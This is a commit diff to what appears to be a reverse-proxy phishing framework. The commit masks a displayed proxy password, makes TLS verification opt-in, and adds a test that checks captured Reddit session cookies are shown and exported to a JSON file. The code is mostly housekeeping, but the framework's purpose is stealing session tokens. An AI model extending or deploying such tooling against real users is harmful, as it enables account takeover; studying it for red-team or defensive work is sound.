Skip to content

Commit 954b42e

Browse files
committed
Remove full printing of proxy password, test session export to file, allow verifying TLS certificates (opt-in)
1 parent 3247eaa commit 954b42e

6 files changed

Lines changed: 29 additions & 5 deletions

File tree

.gitignore

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,4 @@
11
phishlets/test-*
22
/*.exe
33
/tmp_cfg
4+
/export.json

core/banner.go

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@ import (
88
)
99

1010
const (
11-
VERSION = "2.4.2"
11+
VERSION = "2.4.3"
1212
)
1313

1414
func putAsciiArt(s string) {

core/certdb.go

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -394,7 +394,9 @@ func (d *CertDb) registerCertificate(domains []string) (*certificate.Resource, e
394394
func (d *CertDb) getServerCertificate(host string, port int) *x509.Certificate {
395395
log.Debug("Fetching TLS certificate from %s:%d ...", host, port)
396396

397-
config := tls.Config{InsecureSkipVerify: true}
397+
config := tls.Config{
398+
InsecureSkipVerify: (os.Getenv("VALIDATETLS") != "YES"),
399+
}
398400
conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", host, port), &config)
399401
if err != nil {
400402
log.Warning("Could not fetch TLS certificate from %s:%d: %s", host, port, err)

core/http_proxy.go

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1080,6 +1080,7 @@ func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte {
10801080

10811081
func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (*tls.Config, error) {
10821082
return func(host string, ctx *goproxy.ProxyCtx) (c *tls.Config, err error) {
1083+
skipVerify := (os.Getenv("VALIDATETLS") != "YES")
10831084
parts := strings.SplitN(host, ":", 2)
10841085
hostname := parts[0]
10851086
port := 443
@@ -1105,7 +1106,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
11051106
}
11061107
if cert != nil {
11071108
return &tls.Config{
1108-
InsecureSkipVerify: true,
1109+
InsecureSkipVerify: skipVerify,
11091110
Certificates: []tls.Certificate{*cert},
11101111
}, nil
11111112
}
@@ -1127,7 +1128,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
11271128
return nil, err
11281129
}
11291130
return &tls.Config{
1130-
InsecureSkipVerify: true,
1131+
InsecureSkipVerify: skipVerify,
11311132
Certificates: []tls.Certificate{*cert},
11321133
}, nil
11331134
}

core/terminal.go

Lines changed: 9 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -257,8 +257,16 @@ func (t *Terminal) handleProxy(args []string) error {
257257
proxy_enabled = "yes"
258258
}
259259

260+
var censoredPassword string
261+
for i, passChar := range t.cfg.proxyPassword {
262+
appendChar := passChar
263+
if i > 2 {
264+
appendChar = '*'
265+
}
266+
censoredPassword = censoredPassword + string(appendChar)
267+
}
260268
keys := []string{"enabled", "type", "address", "port", "username", "password"}
261-
vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, t.cfg.proxyPassword}
269+
vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, censoredPassword}
262270
log.Printf("\n%s\n", AsRows(keys, vals))
263271
return nil
264272
} else if pn == 1 {

main_test.go

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -136,6 +136,18 @@ func TestStart(t *testing.T) {
136136
terminal.ProcessCommand("sessions 1")
137137
test.assertLogContains("captured", "Session token captured")
138138
test.assertLogContains(`","name":"reddit_session","httpOnly":true`, "Session cookie displayed")
139+
test.Clear()
140+
141+
exportPath := path+"/export.json"
142+
os.RemoveAll(exportPath)
143+
terminal.ProcessCommand("sessions export json "+strings.ReplaceAll(exportPath, `\`, `\\`))
144+
test.assertLogContains("exported sessions to json", "Can export sessions to file")
145+
time.Sleep(1 * time.Second)
146+
readDump, err := ioutil.ReadFile(exportPath)
147+
test.outputResult(
148+
(err == nil && strings.Contains(string(readDump), `"id":"1"`)),
149+
"Dumped sessions are valid",
150+
)
139151

140152
//log.Println(buf.String())
141153
}

0 commit comments

Comments
 (0)